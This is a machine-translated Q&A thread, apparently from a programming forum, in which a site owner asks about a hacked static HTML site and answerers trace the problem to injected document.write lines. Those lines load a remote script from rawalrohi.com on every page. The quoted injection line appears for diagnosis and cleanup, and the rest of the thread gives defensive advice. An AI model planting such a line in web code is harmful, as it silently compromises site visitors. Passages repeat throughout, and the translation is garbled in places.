我们html网站中神秘的url
我们静态html网站的主页正在从一个神秘的网站rawalrohi.com传输数据。您可以通过访问iffort.com并注意那里的页脚来检查这一点。它说从rawalrohi.com传输数据 在我们方面,我们采取了以下措施来纠正这个问题 a、 )分析所有页面的源代码。我们检查了代码,发现在所有页面中都插入了一个脚本src=。我们从网站的所有“html”页面中删除了此脚本 b、 )接下来我们与托管公司进行了交谈,他们说他们可以为我们提供网站的备份。我们有备份,但没有用它来恢复站点 c、 )最后,我们更改了FTP密码,因为我们被告知可能有人入侵了我们的FTP密码 尽管这样做了,主页上仍然显示从rawalrohi.com传输数据。视图源未显示URL。这减慢了我们网站的速度我们html网站中神秘的url,html,security,web,code-injection,Html,Security,Web,Code Injection,我们静态html网站的主页正在从一个神秘的网站rawalrohi.com传输数据。您可以通过访问iffort.com并注意那里的页脚来检查这一点。它说从rawalrohi.com传输数据 在我们方面,我们采取了以下措施来纠正这个问题 a、 )分析所有页面的源代码。我们检查了代码,发现在所有页面中都插入了一个脚本src=。我们从网站的所有“html”页面中删除了此脚本 b、 )接下来我们与托管公司进行了交谈,他们说他们可以为我们提供网站的备份。我们有备份,但没有用它来恢复站点 c、 )最后,我们更
非常感谢您的帮助 您的页面引用了一个名为“js/hyperlinked_Images.js”的文件 请查看此文件,位于底部附近: ... document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>'); document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>'); document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>'); ... 文件。写(“”); 文件。写(“”); 文件。写(“”);
现在请原谅,我要在我的系统上运行一个快速的AV扫描;) 您的页面引用了一个名为“js/hyperlinked_Images.js”的文件 请查看此文件,位于底部附近: ... document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>'); document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>'); document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>'); ... 文件。写(“”); 文件。写(“”); 文件。写(“”);
现在请原谅,我要在我的系统上运行一个快速的AV扫描;) 我最近在一个客户网站上看到了这个,一个不同的url,但在他们所有的文件中都有相同类型的代码注入。为了解决这个问题,我下载了这个站点,并使用VisualStudio对字符串进行了站点范围的“查找和替换”。这为我解决了问题。我建议您对所有文件执行类似的操作,您可能遗漏了一个。我的客户网站上的html/htm/aspx文件都被感染了,ISP发表了同样的声明说FTP密码可能被泄露了…我最近在客户网站上看到了这一点,一个不同的url,但他们所有的文件中都有相同类型的代码注入。为了解决这个问题,我下载了这个站点,并使用VisualStudio对字符串进行了站点范围的“查找和替换”。这为我解决了问题。我建议您对所有文件执行类似的操作,您可能遗漏了一个。我的客户网站上有html/htm/aspx文件,这些文件都被感染了,ISP发表了同样的声明,说FTP密码可能被泄露了…请确保您的防病毒软件已安装。每当你的网站加载有趣的外部脚本(如广告软件、间谍软件)时,你的防病毒软件都会提醒你。确保你的防病毒软件正常运行。每当您的网站加载有趣的外部脚本(如广告软件、间谍软件)时,您的防病毒软件都会提醒您。确保您不使用一个FTP帐户进行所有操作,控制FTP用户控件,这将帮助您管理您的网站。确保您不使用一个FTP帐户进行所有操作,控制FTP用户控件,它将帮助您管理您的网站。我不久前见过类似的行为。在这种情况下,ftp密码被泄露:它是由收集存储的ftp密码的恶意软件从客户端桌面PC读取的 我们是在密码被更改并在几天内再次泄露后才发现这一点的
因此,请确保用一台像样的AV扫描器扫描所有“知道”ftp密码的机器。不久前我也看到过类似的行为。在这种情况下,ftp密码被泄露:它是由收集存储的ftp密码的恶意软件从客户端桌面PC读取的 我们是在密码被更改并在几天内再次泄露后才发现这一点的
因此,请确保你用一台像样的AV扫描仪扫描所有“知道”ftp密码的机器。我没有扫描你的网站,但如果你在网站上使用任何标准软件,如WordPress、Drupal、Joomla等,那么你需要随时更新这些软件。订阅他们的安全警报,当你看到更新时,放下你正在做的一切并更新 黑客不断地在互联网上搜索易受攻击的网站。在易受攻击的网站上,他们只需几秒钟就能感染它 同时,保持所有插件、附加组件、组件、模块、贡献等的更新
否则,您将一次又一次地清理此文件。我没有扫描您的网站,但如果您在您的网站上使用任何标准软件,如:WordPress、Drupal、Joomla等,则您需要随时更新此文件。订阅他们的安全警报,当你看到更新时,放下你正在做的一切并更新 黑客不断地在互联网上搜索易受攻击的网站。在易受攻击的网站上,他们只需几秒钟就能感染它 同时,保持所有插件、附加组件、组件、模块、贡献等的更新
否则,您将一次又一次地清理此文件。这更多是针对serverfault的。这更多是针对serverfault的。谢谢您的回复。我们也应该把它去掉吗?我是说js文件?是的,你可能应该删除它,除非你知道它为什么在那里。只是删除了代码中的最后3行。上传了新文件。还有什么需要编辑的吗?我不确定,但听起来您需要对服务器上的文件进行非常详细的审核。也许在你的托管目录中搜索所有的文件,寻找“rawalrohi”并清理它们。另一种选择是重新格式化服务器,重新安装服务器软件并重新安装站点,前提是站点的备份没有受到污染。这种方法的主要问题是停机时间。而且,并不是所有的托管公司都会让你这么做(或者为你这么做)。是的,你是对的,这是一个漫长的过程。现在我搜索了rawalrohi的托管目录,什么也没找到。谢谢你的帮助